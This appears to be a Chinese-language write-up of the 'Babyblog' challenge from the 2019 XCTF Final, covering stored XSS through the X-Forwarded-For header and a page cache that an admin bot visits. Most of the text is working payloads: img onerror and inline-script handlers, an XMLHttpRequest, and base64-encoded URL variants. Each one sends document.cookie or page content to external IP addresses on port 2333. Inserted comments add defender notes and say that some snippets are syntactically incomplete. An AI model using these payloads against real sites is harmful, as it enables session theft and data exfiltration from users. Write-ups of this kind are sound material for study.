


2019 XCTF Final 部分题解

Xirshir先辈TQL

Babyblog

发现 xff（X-Forwarded-For 请求头）可以注入，且访问 /user.php/xxx 后页面会被缓存。

大致思路为：先通过 xff 写入 XSS 脚本，再访问 /user.php/xxx 使其生成缓存，最后将该缓存页面提交给后台访问。

<!-- Broken-image handler: src=x fails to load, onerror then points this.src at an
     external host with document.cookie base64-encoded in the query string, so the
     cookie leaves the page as an ordinary image request (this.onerror=null stops
     the handler re-firing). Defender notes: HttpOnly session cookies are not
     readable via document.cookie; the root fix is contextual output encoding of
     the reflected header value before it is rendered into the cached page. -->
<img src=x onerror="this.onerror=null;this.src='http://120.77.215.95:2333/?'+btoa(document.cookie)"//
<!-- Zero-delay meta refresh: when the cached page is rendered by the back-end
     visitor it navigates straight to /flag. This is injected markup rather than
     script, so blocking inline script alone does not stop it; the control is
     encoding the reflected header before it reaches the page. As printed the tag
     has no closing '>'. -->
<meta http-equiv="refresh" content="0;url=/flag"
<!-- Inline script variant of the cookie exfiltration above: the whole page is
     navigated to an external host with document.cookie base64-encoded in the
     query. Detection/mitigation notes: a Content-Security-Policy script-src that
     disallows inline script blocks this form; HttpOnly keeps session cookies out
     of document.cookie; outbound navigations carrying long base64 query strings
     are a useful hunting signal in proxy logs. -->
<script>
window.location.href = 'http://120.77.215.95:2333/?' + btoa(document.cookie)
</script>
/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDp3aW5kb3cubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vMTIyLjUxLjExMy4xNjQ6MjMzMy8/JyArIGJ0b2EoZG9jdW1lbnQuY29va2llKQ==%27%3b%0aopen(atob(data))%3b%2F%2F
http://134.175.231.113:8848/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDp3aW5kb3cubG9jYXRpb24uaHJlZiA9ICdodHRwOi8vMTIyLjUxLjExMy4xNjQ6MjMzMy8/JyArIGJ0b2Eob3BlbmVyLmRvY3VtZW50LmJvZHkuaW5uZXJIVE1MKQ==%27%3b%0aopen(atob(data))%3b%2F%2F
// Same-origin read followed by exfiltration: fetches /island/test_03.png with an
// XMLHttpRequest and, when the status is 2xx/3xx, navigates the page to an
// external host with the base64-encoded response body in the query string.
// From a defender's view the fetch itself is a legitimate same-origin request;
// what makes it possible is the earlier script injection, so the fixes are
// upstream (encode reflected input, CSP script-src without inline script), and
// the observable is an unexpected outbound navigation carrying a base64 query.
// NOTE(review): as printed, the `function() {` opened on the onload line is not
// closed before request.send(), so this snippet is not syntactically complete.
var request = new XMLHttpRequest();
request.open('GET', '/island/test_03.png', true);
request.onload = function() {
if (this.status >= 200 && this.status < 400) {
var resp = this.response;
window.location.href = 'http://122.51.113.164:2333/?' + btoa(resp)
}
request.send();
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
/passport?image=%2Fstatic%2Fhead.jpg&island=&fruit=&name=&data=amF2YXNjcmlwdDogdmFyIHJlcXVlc3QgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgcmVxdWVzdC5vcGVuKCdHRVQnLCAnaHR0cDovLzEzNC4xNzUuMjMxLjExMzo4ODQ4L2lzbGFuZC90ZXN0XzAxLnBuZycsIHRydWUpOyByZXF1ZXN0Lm9ubG9hZCA9IGZ1bmN0aW9uKCkgeyBpZiAodGhpcy5zdGF0dXMgPj0gMjAwICYmIHRoaXMuc3RhdHVzIDwgNDAwKSB7IHZhciByZXNwID0gdGhpcy5yZXNwb25zZTsgd2luZG93LmxvY2F0aW9uLmhyZWYgPSAnaHR0cDovLzEyMi41MS4xMTMuMTY0OjIzMzMvPycgKyAocmVzcCk7fSB9OyByZXF1ZXN0LnNlbmQoKTs=%27%3b%0aopen(atob(data))%3b%2F%2F